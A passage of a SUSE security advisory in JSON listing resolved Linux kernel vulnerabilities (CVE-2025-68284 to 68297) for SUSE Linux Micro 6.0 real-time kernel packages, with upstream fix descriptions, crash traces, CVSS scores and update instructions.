"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68286",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68286"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check NULL before accessing\n\n[WHAT]\nIGT kms_cursor_legacy\u0027s long-nonblocking-modeset-vs-cursor-atomic\nfails with NULL pointer dereference. This can be reproduced with\nboth an eDP panel and a DP monitors connected.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 13 UID: 0 PID: 2960 Comm: kms_cursor_lega Not tainted\n6.16.0-99-custom #8 PREEMPT(voluntary)\n Hardware name: AMD ........\n RIP: 0010:dc_stream_get_scanoutpos+0x34/0x130 [amdgpu]\n Code: 57 4d 89 c7 41 56 49 89 ce 41 55 49 89 d5 41 54 49\n 89 fc 53 48 83 ec 18 48 8b 87 a0 64 00 00 48 89 75 d0 48 c7 c6 e0 41 30\n c2 \u003c48\u003e 8b 38 48 8b 9f 68 06 00 00 e8 8d d7 fd ff 31 c0 48 81 c3 e0 02\n RSP: 0018:ffffd0f3c2bd7608 EFLAGS: 00010292\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffd0f3c2bd7668\n RDX: ffffd0f3c2bd7664 RSI: ffffffffc23041e0 RDI: ffff8b32494b8000\n RBP: ffffd0f3c2bd7648 R08: ffffd0f3c2bd766c R09: ffffd0f3c2bd7760\n R10: ffffd0f3c2bd7820 R11: 0000000000000000 R12: ffff8b32494b8000\n R13: ffffd0f3c2bd7664 R14: ffffd0f3c2bd7668 R15: ffffd0f3c2bd766c\n FS: 000071f631b68700(0000) GS:ffff8b399f114000(0000)\nknlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000001b8105000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n dm_crtc_get_scanoutpos+0xd7/0x180 [amdgpu]\n amdgpu_display_get_crtc_scanoutpos+0x86/0x1c0 [amdgpu]\n ? __pfx_amdgpu_crtc_get_scanout_position+0x10/0x10[amdgpu]\n amdgpu_crtc_get_scanout_position+0x27/0x50 [amdgpu]\n drm_crtc_vblank_helper_get_vblank_timestamp_internal+0xf7/0x400\n drm_crtc_vblank_helper_get_vblank_timestamp+0x1c/0x30\n drm_crtc_get_last_vbltimestamp+0x55/0x90\n drm_crtc_next_vblank_start+0x45/0xa0\n drm_atomic_helper_wait_for_fences+0x81/0x1f0\n ...\n\n(cherry picked from commit 621e55f1919640acab25383362b96e65f2baea3c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68286",
"url": "https://www.suse.com/security/cve/CVE-2025-68286"
},
{
"category": "external",
"summary": "SUSE Bug 1255351 for CVE-2025-68286",
"url": "https://bugzilla.suse.com/1255351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68286"
},
{
"cve": "CVE-2025-68287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths\n\nThis patch addresses a race condition caused by unsynchronized\nexecution of multiple call paths invoking `dwc3_remove_requests()`,\nleading to premature freeing of USB requests and subsequent crashes.\n\nThree distinct execution paths interact with `dwc3_remove_requests()`:\nPath 1:\nTriggered via `dwc3_gadget_reset_interrupt()` during USB reset\nhandling. The call stack includes:\n- `dwc3_ep0_reset_state()`\n- `dwc3_ep0_stall_and_restart()`\n- `dwc3_ep0_out_start()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 2:\nAlso initiated from `dwc3_gadget_reset_interrupt()`, but through\n`dwc3_stop_active_transfers()`. The call stack includes:\n- `dwc3_stop_active_transfers()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 3:\nOccurs independently during `adb root` execution, which triggers\nUSB function unbind and bind operations. The sequence includes:\n- `gserial_disconnect()`\n- `usb_ep_disable()`\n- `dwc3_gadget_ep_disable()`\n- `dwc3_remove_requests()` with `-ESHUTDOWN` status\n\nPath 3 operates asynchronously and lacks synchronization with Paths\n1 and 2. When Path 3 completes, it disables endpoints and frees \u0027out\u0027\nrequests. If Paths 1 or 2 are still processing these requests,\naccessing freed memory leads to a crash due to use-after-free conditions.\n\nTo fix this added check for request completion and skip processing\nif already completed and added the request status for ep0 while queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68287",
"url": "https://www.suse.com/security/cve/CVE-2025-68287"
},
{
"category": "external",
"summary": "SUSE Bug 1255152 for CVE-2025-68287",
"url": "https://bugzilla.suse.com/1255152"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68287"
},
{
"cve": "CVE-2025-68289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_eem: Fix memory leak in eem_unwrap\n\nThe existing code did not handle the failure case of usb_ep_queue in the\ncommand path, potentially leading to memory leaks.\n\nImprove error handling to free all allocated resources on usb_ep_queue\nfailure. This patch continues to use goto logic for error handling, as the\nexisting error handling is complex and not easily adaptable to auto-cleanup\nhelpers.\n\nkmemleak results:\n unreferenced object 0xffffff895a512300 (size 240):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n kmem_cache_alloc+0x1b4/0x358\n skb_clone+0x90/0xd8\n eem_unwrap+0x1cc/0x36c\n unreferenced object 0xffffff8a157f4000 (size 256):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n dwc3_gadget_ep_alloc_request+0x58/0x11c\n usb_ep_alloc_request+0x40/0xe4\n eem_unwrap+0x204/0x36c\n unreferenced object 0xffffff8aadbaac00 (size 128):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n __kmalloc+0x64/0x1a8\n eem_unwrap+0x218/0x36c\n unreferenced object 0xffffff89ccef3500 (size 64):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n eem_unwrap+0x238/0x36c",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68289",
"url": "https://www.suse.com/security/cve/CVE-2025-68289"
},
{
"category": "external",
"summary": "SUSE Bug 1255155 for CVE-2025-68289",
"url": "https://bugzilla.suse.com/1255155"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68289"
},
{
"cve": "CVE-2025-68290",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68290"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: fix double free on late probe failure\n\nThe MOST subsystem has a non-standard registration function which frees\nthe interface on registration failures and on deregistration.\n\nThis unsurprisingly leads to bugs in the MOST drivers, and a couple of\nrecent changes turned a reference underflow and use-after-free in the\nUSB driver into several double free and a use-after-free on late probe\nfailures.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68290",
"url": "https://www.suse.com/security/cve/CVE-2025-68290"
},
{
"category": "external",
"summary": "SUSE Bug 1255154 for CVE-2025-68290",
"url": "https://bugzilla.suse.com/1255154"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68290"
},
{
"cve": "CVE-2025-68295",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68295"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix memory leak in cifs_construct_tcon()\n\nWhen having a multiuser mount with domain= specified and using\ncifscreds, cifs_set_cifscreds() will end up setting @ctx-\u003edomainname,\nso it needs to be freed before leaving cifs_construct_tcon().\n\nThis fixes the following memory leak reported by kmemleak:\n\n mount.cifs //srv/share /mnt -o domain=ZELDA,multiuser,...\n su - testuser\n cifscreds add -d ZELDA -u testuser\n ...\n ls /mnt/1\n ...\n umount /mnt\n echo scan \u003e /sys/kernel/debug/kmemleak\n cat /sys/kernel/debug/kmemleak\n unreferenced object 0xffff8881203c3f08 (size 8):\n comm \"ls\", pid 5060, jiffies 4307222943\n hex dump (first 8 bytes):\n 5a 45 4c 44 41 00 cc cc ZELDA...\n backtrace (crc d109a8cf):\n __kmalloc_node_track_caller_noprof+0x572/0x710\n kstrdup+0x3a/0x70\n cifs_sb_tlink+0x1209/0x1770 [cifs]\n cifs_get_fattr+0xe1/0xf50 [cifs]\n cifs_get_inode_info+0xb5/0x240 [cifs]\n cifs_revalidate_dentry_attr+0x2d1/0x470 [cifs]\n cifs_getattr+0x28e/0x450 [cifs]\n vfs_getattr_nosec+0x126/0x180\n vfs_statx+0xf6/0x220\n do_statx+0xab/0x110\n __x64_sys_statx+0xd5/0x130\n do_syscall_64+0xbb/0x380\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68295",
"url": "https://www.suse.com/security/cve/CVE-2025-68295"
},
{
"category": "external",
"summary": "SUSE Bug 1255129 for CVE-2025-68295",
"url": "https://bugzilla.suse.com/1255129"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68295"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? 